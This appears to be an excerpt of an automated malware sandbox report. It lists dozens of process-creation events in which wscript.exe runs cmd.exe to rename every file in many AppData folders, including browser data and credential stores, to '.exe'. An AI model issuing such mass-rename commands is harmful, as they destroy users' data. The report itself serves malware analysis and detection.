    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\virtualstore\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\arm\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\color\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\acrobat_sbx\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\acrocef_low\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\diagnostics\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1090636871\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1191663050\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1234978473\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1318414972\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1421574262\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1635976352\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1693012001\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_1807723660\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_27162369\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_339006160\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_736602331\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\edge_bits_6440_995017740\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\low\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\msedge_url_fetcher_2640_817343797\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\msedge_url_fetcher_5172_761252224\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\symbols\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\cef\user data\dictionaries\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\f4d41c5d09ae781\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\browsermetrics\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\crashpad\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\hyphen-data\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\mediafoundationwidevinecdm\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\meipreload\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\optimizationhints\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\origintrials\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\safetytips\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\shadercache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\subresource filter\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\trusttokenkeycommitments\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\zxcvbndata\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\history.ie5\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\history.ie5\mshist012023100420231005\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\clr_v2.0_32\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\clr_v4.0\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\credentials\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\feeds\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\inputpersonalization\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\playready\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows sidebar\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\edge\user data\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-bh\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-dz\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-iq\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-jo\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-om\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-qa\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-sa\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-tn\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\da-dk\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\en-ca\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\en-hk\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\en-zw\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-419\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-bo\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-cr\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-es\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-ni\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-pe\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-pr\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-uy\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\fr-cd\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\fr-cm\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\fr-fr\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ha-latn-ng\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\he-il\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\hi-in\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\it-ch\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ka-ge\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ms-my\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\nb-no\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\nl-be\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\nl-nl\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ro-ro\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ru-ru\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\sl-si\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\msedge_url_fetcher_5172_761252224\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\cef\user data\dictionaries\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\f4d41c5d09ae781\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\browsermetrics\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\crashpad\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\acrocef_low\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\hyphen-data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\zxcvbndata\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\history.ie5\mshist012023100420231005\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\feeds\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\inputpersonalization\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\wasm\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\playready\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\ar-jo\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\arm\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\soliddocuments\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\acrobat\files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\local storage\leveldb\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\en-zw\*.*" "*.exe"Jump to behavior
